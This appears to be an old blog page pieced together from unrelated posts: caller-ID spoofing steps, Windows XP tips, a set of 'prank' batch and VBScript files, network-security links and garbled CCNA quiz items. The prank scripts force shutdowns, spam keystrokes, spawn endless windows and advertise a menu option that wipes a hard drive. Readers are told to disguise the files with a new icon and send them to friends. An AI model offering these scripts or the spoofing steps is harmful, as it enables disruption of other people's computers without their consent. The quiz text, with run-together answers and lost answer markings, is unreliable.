Wednesday, 15 July 2015

Cyberz

How To Call Your Friends With Their Own Number


With useful prank to confuse your friends. With this mobile hack, you can call your friends with their own mobile number… meaning by, they will see their own number calling them. Just follow the guidelines I have mentioned in this mobile hack article.

Mobile hack to call your friends:

1. Go to http://www.mobivox.com and register there for free account.
2. During registration, remember to insert Victim mobile number in “Phone number”
3. Complete registration and confirm your email id and then login to your account. Click on “Direct WebCall”.
Mobile hack
4. You will arrive at page shown below. In “Enter a number” box, select your country and also any mobile number(you can enter yours). Now, simply hit on “Call Now” button to call your friend with his own number.
cell phone hack
5. That’s it. Your friend will be shocked to see his own number calling him. I have spent last two days simply playing this cool mobile hack prank.
So use this cool mobile hack to surprise and shock your friends. This mobile hack is free. So, you don’t need to lose a buck. Simply register and you’ll be able to perform this mobile hack. This mobile hack is available for almost all countries and all cell phones network providers. If you have any problem in implementing this mobile hack, please mention it in comments.

Install Windows XP In Less Than 15 Minutes

This artice is helpful for the guys who frequently  format and install windows xp operating system on their PC or laptops. Normally XP installation takes around 40 minutes to complete, but this trick will enable you to save 10-15 minutes in Xp installation.
 Follow the steps:-
1. Boot through Windows XP CD.
2. After all the files are completely loaded, you get the option to select the partition. Select c or any disk you want.
3. Now Format the partition, whether it is normal or quick with NTFS or FAT. i suggest to fornat with NTFS
4. Once the formatting is completed, All the setup files required for installation are copied. Restart your system by pressing Enter.
Now, Here begins the Main work which will save your time.
5. After rebooting, you get a screen where it takes 40 minutes to complete or finalize the OS installation.
6. Now just, Press SHIFT + F10 Key -> This will open command prompt.
7. Enter Taskmgr in the command prompt window. This will open Task Manager.
8. Click the Process Tab, here we find a process called Setup.exe >> Right Click on Setup.exe >> Set Priority >> Select High or Above Normal.
All Done..!!!

\10 Notepad Tricks To Freak Your Friends

1>Cycle a message in your friend’s computer:
Type :
@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN
Save it as “Anything.BAT” and send it.
2>Convey your friend a lil’ message and shut down his / her computer:
Type :
@echo off
msg * I don’t like you
shutdown -c “Error! You are too stupid!” -s
Save it as “Anything.BAT” in All Files and send it.
3>Toggle your friend’s Caps Lock button simultaneously:
Type :
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
Save it as “Anything.VBS” and send it.
4>Continually pop out your friend’s CD Drive. If he / she has more than one, it pops out all of them!
Type :
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Save it as “Anything.VBS” and send it.
5>Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
Save it as “Anything.VBS” and send it.
6>Open Notepad, slowly type “Hello, how are you? I am good thanks” and freak your friend out:
Type :
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 100
WshShell.AppActivate “Notepad”
WScript.Sleep 500
WshShell.SendKeys “Hel”
WScript.Sleep 500
WshShell.SendKeys “lo ”
WScript.Sleep 500
WshShell.SendKeys “, ho”
WScript.Sleep 500
WshShell.SendKeys “w a”
WScript.Sleep 500
WshShell.SendKeys “re ”
WScript.Sleep 500
WshShell.SendKeys “you”
WScript.Sleep 500
WshShell.SendKeys “? ”
WScript.Sleep 500
WshShell.SendKeys “I a”
WScript.Sleep 500
WshShell.SendKeys “m g”
WScript.Sleep 500
WshShell.SendKeys “ood”
WScript.Sleep 500
WshShell.SendKeys ” th”
WScript.Sleep 500
WshShell.SendKeys “ank”
WScript.Sleep 500
WshShell.SendKeys “s! ”
Save it as “Anything.VBS” and send it.
7>Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :
MsgBox “Let’s go back a few steps”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
Save it as “Anything.VBS” and send it.
8> Dont ever try
Hack your friend’s keyboard and make him type “You are a fool” simultaneously:
Type :
Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “You are a fool.”
loop
Save it as “Anything.VBS” and send it.
9>Open Notepad continually in your friend’s computer:
Type :
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
Save it as “Anything.BAT” and send it.
10>
Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:
1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :
@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press ‘x’ then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc…
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you’re boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two
Save it as “Anything.BAT” and send it.
You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the ‘Change’ Icon and change the icon from there.
VNETWORK SECURITY

Recent Cyber Attacks

Counter Hack Reloaded (Skoudis and Liston, 2e)

Network Security Essentials (Stallings, 3e)

General Security Tools

SSL Attacks

Cyber Security Links

Cyber Security Papers

  • Critical Infrastructure Interdependencies
  • Performance, Robustness, and Cyber Security of Critical Infrastructure Systems
  • Simplified Wireless Security for Home and Small Business Networks
  • CIS Security Metrics (pdf)

Graduate School Opportunities



  • Center for Cyberspace Research at AFIT
  • Trick to Find Windows XP Product Key from CD Itself

    windows-xp-logoWindows product keys are used in order to activate the OS and reload its full functionality else it will not work properly and even show those un genuine errors, well now Windows XP is little bit older as we have new generation OS ready to be installed on your system like Windows 8.1 or even Windows 7 (I like it a lot) but still if you are a Windows XP addict then we have an awesome trick for you that will allow you to disclose its product key right from the installation CD.

    Yes we posted about the Windows Product key finder tool that scans for the product key on running machine even that can come handy but if you have not installed the OS yet and you are finding the genuine then this tutorial can be lucky for you.
    1. So just pop in the Windows XP installation disc in your CD-Rom and then open the CD using Explorer.
    2. Now you need to find a folder named i386
    3. Now we need to find a file namedUNATTEND.TXT so if you are not able to see the .TXT extension no problem.
    4. So now just open this file using Notepad and scroll down to the bottom till you actually see the Product Key.
    So that's it guys now you are able to see the product key of Windows XP, so now you can use that in order to install Windows XP on your system.


    NETWORKS AND DATA COMMUNICATIONS


    General Information

    General Presentations

    UNIX Network Programming (Stevens, 3rd Edition)

    Wireless Networks

    Cisco 2600 Router

    Cisco 2950 Switch

    CCNA Guide To CISCO Networking (Cannon, 4th Edition)

    Research Papers

    CCNA: Cisco Certified Network Associate: Fast Pass



    Organized by exam objectives, this is a focused, concise review guide that works hand-in-hand with any learning tool, including the Sybex CCNA: Cisco Certified Network Associate Study Guide, 6th and Deluxe editions.

    The book will consist of four high-level chapters, each mapping to the four main Domains of the exam skill-set. The book will drill down into the specifics of the exam, covering the following:

    * Designing Cisco internetworks
    * Developing an access list
    * Evaluating TCP/IP communication
    * Configuring routers and switches
    * Configuring IP addresses, subnet masks, and gateway addresses
    * Performing LAN, VLAN, and WAN troubleshooting
    * Understanding rules for packet control

    The interactive CD contains two bonus exams, handy flashcard questions, and a searchable PDF of a Glossary of Terms.

    The perfect companion to Sybex's CCNA: Cisco Certified Network Associate Study Guide, Sixth or Deluxe editions, or any CCNA study tool

    The Perfect CCNA Preparation and Review Tool

    Many candidates who complete a Study Guide or course also appreciate a review tool that helps them brush up on key topics. Sybex's CCNA Fast Pass, Third Edition, is that tool. This streamlined book hones in on critical information for the new CCNA exam 640-802, including network planning and design, implementation and operation, troubleshooting, and technology. Study, review, and practice with this practical study aid, then take the exam with confidence.

    * Easy-to-use book is organized by exam objectives for quick review
    * Flexible Fast Pass goes hand-in-hand with any learning tool on the market
    * Exam Essentials in each chapter helps you zero in on what you need to know
    * Book includes review questions, practice tools, and two practice exams
    * Targeted and expert content from leading Cisco networking authority, Todd Lammle

    Look inside for complete review coverage of all exam objectives for CCNA Exam 640-802

    Download here (8.3M pdf)


    BCRAN Knowledgenet Labs



     

    Sample CCNA 

    CCNA 1 - Module 10

    Options With Highlight Colours are Correct Answer



    1. Refer to the exhibit. A student working in the lab selects a cable that is wired as shown. Which connection types can successfully be made with this cable? (Choose two.)connecting a PC to a router's console port
    connecting two routers together via their fast ethernet portsconnecting two switches together at gigabit speeds
    connecting a PC to a switch at Gigabit Ethernet speeds
    connecting two devices with the same interface type at Fast Ethernet speeds




    2. Which option identifies the primary interface which would be used for initial configuration of a Cisco router?AUX interface
    Ethernet interface
    serial interface
    console interface
    3. What makes fiber preferable to copper cabling for interconnecting buildings? (Choose three.)greater distances per cable runlower installation cost
    limited susceptibility to EMI/RFIdurable connections
    greater bandwidth potentialeasily terminated
    4. A network administrator is required to use media in the network that can run up to 100 meters in cable length without using repeaters. The chosen media must be inexpensive and easily installed. The installation will be in a pre-existing building with limited cabling space. Which type of media would best meet these requirements?STP
    UTP
    coaxial
    single-mode fiber
    multimode fiber5. What does the term "attenuation" mean in data communication?loss of signal strength as distance increasestime for a signal to reach its destination
    leakage of signals from one cable pair to another
    strengthening of a signal by a networking device

    6. How many host addresses may be assigned on each subnetwork when using the 130.68.0.0 network address with a subnet mask of 255.255.248.0?
    30
    256
    20462048
    4094
    40967. Which subnet mask would be assigned to the network address of 192.168.32.0 to provide 254 useable host addresses per subnetwork?255.255.0.0
    255.255.255.0
    255.255.254.0
    255.255.248.08. A company is planning to subnet its network for a maximum of 27 hosts. Which subnet mask would provide the needed hosts and leave the fewest unused addresses in each subnet?
    255.255.255.0
    255.255.255.192
    255.255.255.224
    255.255.255.240
    255.255.255.248
    9. What type of network cable is used between a terminal and a console port?
    cross-over
    straight-through
    rolloverpatch cable
    10. Which device is used to create or divide broadcast domains?hub
    switch
    bridge
    router
    repeater
    11. Refer to the exhibit. What destination IP address will PC1 place in the header for a packet destined for PC2?192.168.1.1
    192.168.2.1
    192.168.2.2
    192.168.3.1
    192.168.3.54
    12. Refer to the exhibit. Based on the IP configuration shown, what would be the result of Host A and Host B attempting to communicate outside the network segment?

    both host A and B would be successful
    host A would be successful, host B would fail
    host B would be successful, host A would failboth Host A and B would fail

    13. Which three types of connectors are commonly associated with Cisco's V.35 serial cables? (Choose three.)RJ 11
    DB 60
    Winchester 15 pin

    DB 9
    smart serialRJ 45
    14. Refer to the exhibit. How many subnets are required to support the network that is shown?
    2
    3
    4
    5
    15. What are three common methods for setting a UTP Ethernet port to MDI or MDIX operation? (Choose three.)

    direct configuration of the devicecable color code association
    cable selection and configuration
    use of cable testers to determine pinouts
    the enabling of the mechanism to electrically swap the transmit and receive pairs
    the automatic detection and negotiating of MDI/MDIX operation of the port

    16. Which three statements are true about the role of routers in the network? (Choose three.)They propagate broadcasts.
    They enlarge collision domains.
    They segment broadcast domains.
    They interconnect different network technologies.
    Each router interface requires a separate network or subnet.
    They maintain a common frame format between LAN and WAN interfaces.
    17. Refer to the exhibit. A network administrator has decided to use packet capture software to evaluate all traffic from the student subnet on the way to the Internet. To ensure that all packets are captured, what network device should be used to connect the monitoring station to the network between R1 and R2?
    router
    hub
    switch
    wireless access point

    18. Refer to the exhibit. Assume that all devices are using default settings. How many subnets are required to address the topology that is shown?
    1
    3
    4
    5
    7
    19. Refer to the exhibit. Which three statements are true about the exhibited topology? (Choose three.)
    Hosts B and C are in the same subnet.
    Five broadcast domains are present.
    Host B is using a crossover cable to connect to the router.
    Four broadcast domains are present.
    Five networks are shown.Host B is using a rollover cable to connect to the router.20. To establish a console connection from a computer to a Cisco router, which cable wiring option would be used?crossover cable
    straight through cable
    rollover cable
    V.35 cable
    21. Refer to the exhibit. Which three statements identify the type of cabling that would be used in the segments that are shown? (Choose three.)
    Segment 1 uses backbone cabling.
    Segment 1 uses a patch cable.Segment 3 uses patch cabling.
    Segment 3 uses vertical cabling.
    Segment 3 uses horizontal cabling.
    Segment 4 uses vertical cabling.

    22. Refer to the exhibit. A network technician has been allocated the 192.168.1.0/24 private IP address range for use in the network that shown in the exhibit. Which subnet mask would be used to meet the host requirements for segment A of this internetwork?
    255.255.255.128
    255.255.255.192
    255.255.255.224255.255.255.240
    255.255.255.248

     

    CCNA 1 - Module 11

    Options With Highlight Colours are Correct Answer
    1. Users in the network are experiencing slow response time when doing file transfers to a remote server. What command could be issued to determine if the router has experienced any input or output errors?
    show running-config
    show startup-config
    show interfaces
    show ip route
    show version
    show memory



    2. Refer to the exhibit. A technician applies the configuration in the exhibit to a clean router. To verify the configuration, the technician issues the show running-config command in the CLI session with the router. What lines should the technician expect to see in the router output from the show running-config command?
    enable password classline console 0password ccna
    enable secret ciscoenable password classline console 0password ccna
    enable secret 5 $1$v0/3$QyQWmJyT7zCa/yaBRasJm0enable password classline console 0password ccna
    enable secret ciscoenable password 7 14141E0A1F17line console 0password 7 020507550Aenable secret 5 $1$v0/3$QyQWmJyT7zCa/yaBRasJm0enable password 7 14141E0A1F17line console 0password 7 020507550A


    3. Refer to the exhibit. A network administrator on HostA has problems accessing the FTP server. Layer three connectivity testing was successful from HostA to the S1 interface of RouterB. Which set of commands will allow the network administrator to telnet to RouterB and run debug commands?RouterB(config)# enable secret class

    RouterB(config)# line vty 0 4

    RouterB(config-if)# login
    RouterB(config)# enable secret class

    RouterB(config)# line vty 0 2

    RouterB(config-vty)# password cisco

    RouterB(config-vty)# login
    RouterB(config)# enable secret class

    RouterB(config)# line vty 0

    RouterB(config-line)# password cisco
    RouterB(config-line)# loginRouterB(config)# enable secret class
    RouterB(config)# line aux 0
    RouterB(config-line)# password cisco
    RouterB(config-line)# login
    RouterB(config)# enable secret class
    RouterB(config)# line aux 0
    RouterB(config-vty)# password cisco
    RouterB(config-vty)# login
    4. Refer to the exhibit. The output is shown for the show ip route command executed on Router A. What does the IP address 192.168.2.2 represent?
    Gateway for the 192.168.1.0 network
    Gateway for the 192.168.3.0 network
    IP assigned to the serial port on Router A
    IP assigned to the serial port on Router B
    5. What command is used to change the default router name to Fontana?Router# name Fontana
    Router# hostname Fontana
    Router(config)# name Fontana
    Router(config)# hostname Fontana
    6. The serial connection shown in the graphic needs to be configured. Which configuration commands must be made on the Sydney router to establish connectivity with the Melbourne site? (Choose three.)Sydney(config-if)# ip address 201.100.53.2 255.255.255.0
    Sydney(config-if)# no shutdown
    Sydney(config-if)# ip address 201.100.53.1 255.255.255.224
    Sydney(config-if)# clock rate 56000Sydney(config-if)# ip host Melbourne 201.100.53.27. Refer to the exhibit. What additional command is required to allow remote access to this switch?
    NA-SW1(config-if)# no shutdown
    NA-SW1(config)# enable password password
    NA-SW1(config)# ip default-gateway addressNA-SW1(config-if)# description description
    8. When network services fail, which port is most often used to access a router for management purposes?AUX
    Ethernet
    ConsoleTelnet
    SSH
    9. A network administrator needs to keep the user ID, password, and session contents private when establishing remote CLI connectivity with a router to manage it. Which access method should be chosen?
    Telnet
    Console
    AUX
    SSH
    10. In a Cisco router, when do changes made to the running-configuration take effect?
    after a system restart
    as the commands are entered
    when logging off the system
    when the configuration is saved to the startup-configuration
    11. Refer to the exhibit. Which names correctly identify the CLI mode represented by the prompt for Switch-East4#? (Choose two.)
    line configuration mode
    user executive mode
    global configuration mode
    privileged executive modeinterface configuration mode
    enable mode12. Which three terms correctly define the forms of help available within the Cisco IOS? (Choose three.)hot keys
    context-check
    context-sensitive
    structured check
    command override
    command syntax check
    13. Which combination of keys would be used at the CLI prompt to interrupt a ping or traceroute process?Ctrl-C
    Ctrl-P
    Ctrl-R
    Ctrl-Shift-6
    Ctrl-Z

    14. Refer to the exhibit. What command will place the router into the correct mode to configure an appropriate interface to connect to a LAN?
    UBAMA# configure terminal
    UBAMA(config)# line vty 0 4UBAMA(config)# line console 0
    UBAMA(config)# interface Serial 0/0/0
    UBAMA(config)# interface FastEthernet 0/1
    15. On a Cisco router, which interface would be used to make the initial configuration?Console Port
    16. Refer to the exhibit. A student is responsible for the IP addressing, configuration and connectivity testing of the network shown in the graphic. A ping from host B to host C results in a destination unreachable but a ping from host B to host A was successful. What two reasons could account for this failure based on the graphic and partial router output for the Dallas router? (Choose two.)The host A is turned off.
    The Fa0/0 interface on Dallas is shutdown.
    The LAN cable is disconnected from host B.
    The S0/0/1 IP address of Dallas is improperly configured.The Fa0/0 interface on Dallas is in a different subnet than host B.
    The clock rate is missing on the serial link between Dallas and NYC.

No comments:

Post a Comment